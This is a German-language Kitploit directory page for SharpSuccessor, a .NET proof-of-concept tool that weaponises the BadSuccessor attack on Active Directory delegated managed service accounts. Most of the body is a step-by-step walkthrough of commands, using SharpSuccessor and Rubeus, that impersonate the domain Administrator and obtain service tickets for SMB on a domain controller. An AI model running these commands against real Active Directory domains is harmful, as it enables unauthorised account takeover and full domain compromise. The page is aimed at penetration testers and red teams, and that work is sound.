Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
SharpSuccessor — SharpSuccessor ist ein .NET-Proof-of-Concept (POC) zur vollständigen Waffenisierung von Yuval Gordons (@YuG0rd) BadSuccessor-Angriff von Akamai. | Kitploit
Tools/GitHubGitHub/logangoins/sharpsuccessor
Privilege EscalationExploitationPost-ExploitationPenetrationstestsIdentitäts- & Zugriffsmanagement (IAM)AuthentifizierungRed Teaming
GitHublogangoins/sharpsuccessor

SharpSuccessor

SharpSuccessor ist ein .NET-Proof-of-Concept (POC) zur vollständigen Waffenisierung von Yuval Gordons (@YuG0rd) BadSuccessor-Angriff von Akamai.

Repository anzeigen
4217015vor 1 JahrVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

SharpSuccessor

SharpSuccessor ist ein .NET Proof of Concept (POC), das den BadSuccessor-Angriff von Yuval Gordon (@YuG0rd) von Akamai vollständig waffenfähig macht. Ein Benutzer mit geringen Rechten, der CreateChild-Berechtigungen für eine beliebige Organisationseinheit (OU) in der Active-Directory-Domäne besitzt und Schreibzugriff auf ein Zielobjekt hat, kann eine Kontoübernahme durchführen.

Verwende SharpSuccessor, um das dMSA-Objekt hinzuzufügen und waffenfähig zu machen sowie die passenden Attribute auf dem Zielkonto zu schreiben, das du impersonieren möchtest:

SharpSuccessor.exe add /impersonate:Administrator /path:"ou=test,dc=lab,dc=lan" /account:jdoe /name:attacker_dMSA

image

Fordere ein TGT im aktuellen Benutzerkontext an, in diesem Fall jdoe:

Rubeus.exe tgtdeleg /nowrap

image

Verwende dann dieses tgt, um das dMSA-Konto zu impersonieren:

Rubeus.exe asktgs /targetuser:attacker_dmsa$ /service:krbtgt/lab.lan /opsec /dmsa /nowrap /ptt /ticket:doIFTDCCB.....

image

Nun kannst du ein Dienstticket mit Administrator-Kontext für jeden SPN anfordern, einschließlich der Domänencontroller für die Post-Exploitation. Zum Beispiel zeige ich hier die Admin-Rechte für SMB auf dem Domänencontroller:

Rubeus.exe asktgs /user:attacker_dmsa$ /service:cifs/WIN-RAEAN26UGJ5.lab.lan /opsec /dmsa /nowrap /ptt /ticket:doIF2DCCBdS...

image

Jetzt, da wir das Ticket im Speicher haben, können wir den Zugriff testen:

image

Unterstützung und Inspirationen

Ein riesiges Dankeschön an Jim Sykora und Garrett Foster für die Inspirationen und die Unterstützung bei diesem Tool!

Tool herunterladen